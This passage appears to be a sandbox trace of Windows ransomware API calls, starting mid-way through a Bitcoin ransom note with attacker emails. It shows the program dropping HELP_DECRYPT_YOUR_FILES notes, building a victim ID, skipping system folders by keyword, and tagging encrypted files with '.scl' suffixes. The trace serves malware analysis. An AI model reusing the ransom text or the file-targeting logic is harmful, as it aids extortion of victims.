?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.829] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0171.832] CloseHandle (hObject=0x388) returned 1
	[0171.832] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.833] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.834] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0171.835] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.835] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.835] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.835] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.836] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0171.836] CloseHandle (hObject=0x388) returned 1
	[0171.838] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7ff05d46, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ff2c016, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.839] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*") returned 84
	[0171.839] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.839] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*") returned 0x54
	[0171.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="windows") returned 0x0
	[0171.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.840] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="boot") returned 0x0
	[0171.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.840] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="system volume information") returned 0x0
	[0171.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.840] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="temp") returned 0x0
	[0171.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="program files") returned 0x0
	[0171.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="appdata") returned 0x0
	[0171.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="application data") returned 0x0
	[0171.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="winnt") returned 0x0
	[0171.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="tmp") returned 0x0
	[0171.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="cache") returned 0x0
	[0171.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="webcache") returned 0x0
	[0171.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.844] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="inetcache") returned 0x0
	[0171.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.844] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="nvidia") returned 0x0
	[0171.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.844] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="packages") returned 0x0
	[0171.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.845] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="cookies") returned 0x0
	[0171.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.845] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpSrch="programdata") returned 0x0
	[0171.845] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.845] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.845] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7ff05d46, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ff2c016, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.846] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.846] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fe9378b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fe9378b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7feb99da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0171.846] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ff2c016, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ff2c016, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ff5268c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.846] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ff05d46, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ff05d46, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ff2c016, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.846] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fedfd20, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fedfd20, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ff05d46, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0171.846] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0171.846] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0171.846] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0171.846] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}"
	[0171.847] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\"
	[0171.847] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov"
	[0171.847] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov"
	[0171.847] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\"
	[0171.847] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\"
	[0171.847] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*"
	[0171.847] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0171.848] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*") returned 89
	[0171.848] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.848] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*") returned 0x59
	[0171.848] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0171.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0171.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0171.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0171.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0171.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0171.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0171.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0171.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0171.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0171.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.863] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0171.863] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.864] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0171.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.864] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0171.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.864] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0171.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.864] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0171.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.865] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0171.865] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0171.865] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0171.865] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x157, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0171.865] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0171.865] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0171.866] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\"
	[0171.866] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml"
	[0171.866] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml") returned 97
	[0171.866] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.866] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml") returned 0x61
	[0171.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.866] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.866] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"
	[0171.867] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml") returned 97
	[0171.867] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.867] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0171.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
